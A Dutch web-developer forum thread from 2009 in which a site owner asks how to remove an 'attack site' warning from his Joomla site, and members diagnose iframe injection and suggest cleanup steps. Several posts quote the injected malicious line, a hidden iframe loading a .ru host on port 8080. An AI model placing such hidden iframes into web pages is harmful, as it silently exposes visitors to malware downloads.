Aanvalssite

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Back-end ontwikkelaar

Functie omschrijving Wil jij meebouwen aan diverse databasesystemen in een klein bedrijf met een platte organisatie? In een team van ruim 10 ontwikkelaars wordt er aan diverse ICT oplossingen gewerkt. Jouw taken hierbij zullen bestaan uit: Het onderhouden en door-ontwikkelen van bestaande databases. Denk hierbij aan schema verbeteringen en performance-tuning. Bij nieuwe ontwikkelingen ga jij ook bezig met het bouwen van het databaseschema. Omdat je in een klein team werkt zal je ook de C# routine verder uitbouwen en ontwikkelen. Ook kan je meedraaien in algemene refactory-, ontwikkel- of testwerkzaamheden. Je zal voornamelijk gebruik maken van de volgende technieken: .NET

Bekijk vacature »

Front-end Developer (HTML/CSS, Angular/React/Vue,

Functie Je zal aan de slag gaan in een klein, hecht team met front-end development experts die de ambitie delen mooi werk te leveren. Samen met hen zal je werken aan het gebruiksvriendelijk en interactief maken van complexe webapplicaties, websites en mobile apps. Je levert klanten wat ze nodig hebben terwijl je actief aan jezelf blijft werken met de ondersteuning vanuit je werkplek. Talen als Javascript programmeer jij vloeiend en je hebt kennis van frameworks als React en Angular. Je zou je het liefst nog veel meer ontwikkelen in verschillende front-end talen. Deze kennis deel je graag met je collega’s,

Bekijk vacature »

.NET Software Developer

Dit ga je doen Als .NET Software Developer zul jij je voornamelijk bezig houden met: Het van scratch af aan bouwen van applicaties (.NET, C#, Bootstrap, KnockoutJs en WebAPI2); Het testen van jouw code d.m.v. het uitvoeren van unittesten; Het oplossen van bugs in de code; Het onderhouden van contact met collega's betreffende de door jouw ontwikkelde applicaties; Het verbeteren en doorontwikkelen van maatwerkapplicaties. Hier ga je werken Jij gaat aan de slag als .NET Software Developer en gaat je focussen op het bedenken, ontwikkelen en testen van maatwerkapplicaties in voornamelijk C#. Dit ga je doen bij een grote, internationale

Bekijk vacature »

Back end developer PHP

Functie Heb jij altijd al eens bij een bedrijf willen werken waar jij géén nummertje bent, die alleen maar uitvoerend werk doet? Dan zou je hier perfect passen! Tuurlijk, je werkt aan projecten voor grote of kleine bedrijven… Het enige verschil hier is, jouw mening telt hier écht. Jouw inbreng wordt gewaardeerd, serieus genomen en gebruikt. En vergeet niet, je werkt niet alleen aan deze projecten. Er werken in totaal ruim 25 developers en designers, onderverdeeld over 3 development teams. Voornamelijk bestaande uit Medior en Senior developers, die samen voor een inspirerende en ambitieuze omgeving zorgen. Hun visie is namelijk

Bekijk vacature »

Software Ontwikkelaar PHP

Functie omschrijving Software Ontwikkelaar PHP gezocht! Wij zijn op zoek naar een ervaren PHP Software Ontwikkelaar om het team van onze opdrachtgever te versterken! De ideale kandidaat zal fungeren als verlengstuk van klanten en complexe technische vraagstukken met enthousiasme benaderen. Naast het werken met de nieuwste technologieën, ben je in staat om aan meerdere projecten tegelijkertijd te werken. Als je deze uitdaging aangaat, werk je nauw samen met front-end developers en draag je bij aan het realiseren van grote veranderingen bij klanten. Het bedrijf zoekt iemand die zichzelf graag uitdaagt en altijd streeft naar het leveren van de beste resultaten.

Bekijk vacature »

SQL Database ontwikkelaar

Functie omschrijving Wil jij meewerken aan het creëren van slimme software om magazijnen als een geoliede machine te laten lopen? Wij zoeken een zorgvuldig persoon, iemand die niet snel de hand omdraait voor complexe algoritmes. Denk jij dat jij de SQL ontwikkelaar bent die wij zoeken? Lees snel verder en wie weet zitten we binnenkort samen aan tafel! Jouw werkzaamheden zullen er als volgt uitzien: Je houdt je bezig met het ontwerpen en ontwikkelen van MS SQL server databases, dit doe je met T-SQL als programmeer laag. Je gaat aan high-end software oplossingen werken, dit doe je voor de optimalisatie

Bekijk vacature »

Database Developer

Functieomschrijving Heb jij ongeveer 3 jaar ervaring als Database Developer met MS SQL of een vergelijkbare database? Wil jij werken voor een gewaardeerde werkgever in regio Tilburg waar jij de tijd en ruimte krijgt jezelf te ontwikkelen? Lees dan snel verder! Hoe ziet jouw takenpakket eruit? Je houdt je bezig met het creëren en bouwen van MS SQL server databases; Je gaat projecten vanaf het begin tot het eind begeleiden. Je sluit aan bij meetings met klanten om hun processen in kaart te brengen. Vervolgens voer jij het project uit en zorgt dat dit zo goed mogelijk verloopt; Je werkt

Bekijk vacature »

C# .NET Software Developer

Functie omschrijving Ben jij op zoek naar een nieuwe uitdaging binnen software development waar je gaat werken voor een jong en flexibel bedrijf? Lees dan snel verder! Wij zijn op zoek naar een Software Developer met ervaring binnen C# .NET die enthousiast wordt van het aansluiten en begeleiden van (complexe) nieuwe klanten. Verder begeleid je complexe projecten, ben jij iemand die altijd kansen ziet? Dan zoeken wij jou! In deze functie ga jij je bezighouden met: Meedenken in oplossingsrichtingen; Werken aan de architectuur; Het verbeteren van functionaliteiten binnen het dataplatform; Ontwikkelen van nieuwe technologieën. Bedrijfsprofiel Waar ga je aan de

Bekijk vacature »

.NET Developer C# VB

Samengevat: Deze werkgever is actief in software voor het matchen van vraag en aanbod van gebruikte auto-onderdelen. Ben jij een .NET Developer? Heb je ervaring met het ontwikkelen (REST) en integreren van webservices? Vaste baan: C# .NET Developer C# VB HBO €2.600 - €6.200 Wij ontwikkelen software om vraag en aanbod van onderdelen van personenauto's bij elkaar te brengen. Deze werkgever is een veelzijdige organisatie. Je werkt voor de eigen IT organisatie. Zij werken met moderne technologie en staan open voor innovatie. De branche van dit bedrijf is Automotive. Functie: Voor de vacature als .NET Developer Dordrecht HBO ga je

Bekijk vacature »

SQL Developer

Functie omschrijving Altijd al willen werken bij een snelgroeiend bedrijf, actief in de logistieke sector? Dit is je kans! Ik ben op zoek naar een ervaren SQL Developer in de omgeving Tilburg. Dit bedrijf is gespecialiseerd in in de ontwikkeling van software en maatwerk oplossingen voor het automatiseren van logistieke processen. Klanten zijn o.a. BOL en andere grote distributiecentrums. Jouw taken worden vooral: Verantwoordelijk voor ontwikkelen van stored procedures, voor snelle afhandeling van data; Optimalisatie van de SQL query's en T-SQL query's; Jij gaat je bezig houden met ontwerpen, ontwikkelen en optimaliseren van de MS SQL Databases; In deze functie

Bekijk vacature »

Hands-on Solution Architect / Software Architect (

TenneT is hard groeiend om de onze ambities waar te kunnen maken. Zo nemen wij een leidende rol in het aanjagen van de energietransitie. Het werven van nieuw talent speelt daarin een cruciale rol. Wij zijn op zoek naar een gedreven Solution Architect / Software Architect op onze locatie Arnhem die hieraan wil bijdragen en misschien ben jij dat wel? Jouw bijdrage aan TenneT Je werkt samen met gedreven DevOps teams, bestaande uit frontend, backend en middleware developers, testers, UX-designers. Samen met de teams ben je continu op zoek naar de beste oplossingen voor onze klanten. Als Solution Architect onderzoek

Bekijk vacature »

Full stack .NET developer Microsoft 365

Wat ga je doen als Full stack .NET developer Microsoft 365? Je stelt je op als sparringpartner voor het team en PO over toekomstige functionaliteiten, architectuur en mogelijke nieuwe producten. Je bent mede-verantwoordelijk voor het vertalen en omzetten van een user story in een passend technisch design. Je implementeert functionaliteiten op basis van een technisch design en user story. Je bent mede-verantwoordelijk voor het beheer van Azure DevOps, waaronder het beheer van GIT, Build Pipelines, Release Pipelines en geautomatiseerde testen. Hier herken jij jezelf in Hbo werk- en denkniveau of hoger aangevuld met relevante certificeringen en/of cursussen; Minimaal 3 jaar

Bekijk vacature »

Freelance JAVA / C# Developer

Functieomschrijving Voor een opdrachtgever in omgeving Zoetermeer zijn wij op zoek naar ervaren JAVA of C# Developers die graag op projectbasis willen werken. Je komt terecht bij een informele developers club die mooie projecten uitvoeren voor grote klanten. Ben je een ervaren freelancer of werk je in loondienst en ben je toe aan een nieuwe uitdaging? Lees dan snel verder want wie weet is dit een leuke vacature voor jou! Het fijne van deze werkgever is dat je zelf mag beslissen hoe je te werk wilt gaan. Wil je als freelancer werken dan is dat OK. Wil je de zekerheid

Bekijk vacature »

Ambitieuze Junior/Medior Low-code Developers gezoc

Bedrijfsomschrijving Transformeer bedrijven met jouw expertise in innovatieve technologie Ben je een bedreven softwareontwikkelaar met ervaring in Low-code platformen, of sta je te popelen om je in deze baanbrekende oplossing te verdiepen? Wij zijn op zoek naar jou! Ons klantenbestand groeit en we willen ons team uitbreiden met deskundige en leergierige Low-code specialisten. Is het jouw passie om organisaties te ondersteunen in hun digitale transformatie en maatwerkoplossingen te bieden met behulp van geavanceerde software? Wij zijn een vooruitstrevend bedrijf dat dagelijks werkt aan het oplossen van complexe vraagstukken om de digitale ambities van onze klanten te realiseren. Functieomschrijving Ontwikkel op

Bekijk vacature »

Senior .NET developer

Functie As a Senior .NET developer you will work in our Research & development team. Our team consists of 17 colleagues! We are currently busy setting up a completely new architecture for a new product. We use VS2022 and .NET 6.0 for our new product. Your function is therefore mainly backend oriented. Since we develop measuring equipment for the chemical industry, it is also very important to develop high-quality software for its control. You are also responsible for designing, implementing and testing new features. For this position its also very important to ensure future-proof and sustainable architecture. Eisen - A

Bekijk vacature »

Pagina: 1 2 volgende »

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:30:00
Quote Anchor link
als ik naar mijn site ga met firefox krijg ik een melding van gerapporteerde aanvalssite, waarschijnlijk krijgen andere bezoekers dit dus ook, hoe krijg ik dit voor iedereen weg?

De site: http://www.vvhunsingo.nl/
 
PHP hulp

PHP hulp

24/04/2024 11:08:32
 
Jan Koehoorn

Jan Koehoorn

12/07/2009 12:32:00
Quote Anchor link
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:36:00
Quote Anchor link
het is dus een joomla site en ik had deze regel
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<iframe src="http://u9i.ru:8080/index.php" width=173 height=131 style="visibility: hidden"></iframe>

weggehaald omdat ik anders een foutmelding kreeg:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90
 
Timen kut

Timen kut

12/07/2009 12:39:00
Quote Anchor link
http://blog.combell.com/2009/06/21/combell-tech-opgelet-voor-hackers-via-iframe-injection/

i frame injection.. heb ik ook gehad.. Is heel irritant. En als je eenmaal geinfecteerd bent, kan het dus ook overschieten naar andere FTP's waar je op inlogt, dus ook op die van klanten!

edit: Google recommends:http://www.stopbadware.org/home/security
Gewijzigd op 01/01/1970 01:00:00 door Timen kut
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:51:00
Quote Anchor link
er staat:
Gebruik uw virusscanner om het virus te neutraliseren

Hoe doe ik dit?
 
Timen kut

Timen kut

12/07/2009 12:52:00
Quote Anchor link
Je virus scannen gebruiken om het virus te neutraliseren meestal....

Het virus staat namelijk LOKAAL en niet alleen op je server..

Wat ik heb gedaan is : backup maken van mn hele FTP, FTP HELEMAAL leeggegooid, daarna Adaware en avast scans gedaan, en dan alles weer op de FTP gezet...
 
Midas

Midas

12/07/2009 14:44:00
Quote Anchor link
Volgens mij is die .ru site inmiddels offline.
 
Naam Loos

Naam Loos

12/07/2009 14:58:00
Quote Anchor link
Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.


Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
 
Midas

Midas

12/07/2009 15:00:00
Quote Anchor link
Bramboos schreef op 12.07.2009 14:58:
Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.


Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Hij is ook wel online, alleen je wordt doorgeschakeld naar de host.
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 17:00:00
Quote Anchor link
ik heb mn site gescand met Kaspersky maar hij vind niets, wat nu?

Als ik na de melding van aanvalssite verder klik naar mn site, zie ik dat hij er ook niet meer normaal uitziet
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 19:01:00
Quote Anchor link
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla
 
Roeltje M

Roeltje M

12/07/2009 20:00:00
Quote Anchor link
Alles uploaden, met dreamweaver zoeken/vervangen op map: (de hoofdmap) en dan dat stukje vervangen in niets. Tadaa :)
 
Afra ca

Afra ca

12/07/2009 20:32:00
Quote Anchor link
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.
 
Wouter De Schuyter

Wouter De Schuyter

12/07/2009 20:56:00
Quote Anchor link
Jan Koehoorn schreef op 12.07.2009 12:32:
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?

Wat is de huidige status van vvhunsingo.nl?

Deze site is als verdacht aangemerkt - het bezoeken van deze site kan uw computer beschadigen.

Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.

Wat is er gebeurd toen Google deze site bezocht?

Van de 10 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 5 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-07-12. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-11.

Schadelijke software wordt op 1 domein(en) gehost, waaronder a3l.ru/.

This site was hosted on 1 network(s) including AS31477 (DUOCAST).

Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?

Het lijkt erop dat vvhunsingo.nl in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.



JanWillem117 schreef op 12.07.2009 19:01:
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200

Actual Search And Replace! Gebruik ik vaak..
Gewijzigd op 01/01/1970 01:00:00 door Wouter De Schuyter
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 21:00:00
Quote Anchor link
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.


Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg
 
Roel -

Roel -

12/07/2009 21:53:00
Quote Anchor link
Ik heb er pas nog last van gehad, een week geleden ofzo. Je moet ook op je error pagina's letten, hij infecteert namelijk bestanden met "index" en je error pagina's.

Diagnostische pagina voor vvhunsingo.nl - Google
 
Afra ca

Afra ca

12/07/2009 22:01:00
Quote Anchor link
JanWillem117 schreef op 12.07.2009 21:00:
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.


Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg


Gebruik versie 5.4.3 van notepad++ (5.4.4 gaf wat vervelende problemen in windows 7 bij mij) en je kan prima search + replace doen:

http://img339.imageshack.us/img339/4296/capturej.png
 
Filip Smets

Filip Smets

12/07/2009 23:26:00
Quote Anchor link
Database Error: Unable to connect to the database:Could not connect to MySQL

Meer krijg ik niet te zien hoor.
 
JanWillem BlaBla

JanWillem BlaBla

12/07/2009 23:33:00
Quote Anchor link
Dat is nu weer opgelost maar in Firefox ziet de site er bij mij niet uit zoals het hoort en in Opera wel.(Ook in IE ziet het er bij mij normaal uit)

Hoe is dit bij jullie?
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla
 
- SanThe -

- SanThe -

13/07/2009 08:05:00
Quote Anchor link
Bij het openen van bovenstaande link liep mijn computer geheel vast.
 
JanWillem BlaBla

JanWillem BlaBla

13/07/2009 19:18:00
Quote Anchor link
Als ik nu naar mn site ga in IE krijg ik een melding dat Adobe Acrobat wil openen, hoe kan dat? Ook krijg ik een melding van een virus, ik had mn site helemaal gescand
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.